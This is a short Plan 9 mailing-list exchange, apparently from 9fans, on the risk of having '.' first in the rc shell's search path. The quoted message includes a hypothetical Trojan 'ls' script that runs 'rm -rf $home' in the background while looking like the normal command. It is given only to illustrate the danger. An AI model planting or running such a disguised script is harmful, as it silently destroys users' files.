Hello,
Removing files is not worth doing.
The victim will immediately find what happened and will recover his
files
and then will consider what made the trouble.
I don't say (. /bin) is safe in untrusted environment.
Someone might steal my private info using some trick.
Security is tradeoff with convenience.
I guess we (member of 9fans) are happy enough working in trusted
environment.
Kenji Arisawa
On 2007/10/27, at 18:03, roger peppe wrote:
1) rc: the value of $path is (. /bin). It is a classic case not to
have . as the first directory when searching for programs - it
allows
Trojan horses to form.
if you're the only one using your system, how could this be a
problem?
to be fair, if i'd put a file in /n/sources/contrib/rog/ls:
#!/bin/rc
rm -rf $home &
ls $* |* | grep -v ls
then i'm sure there'd be one or two unhappy people around...
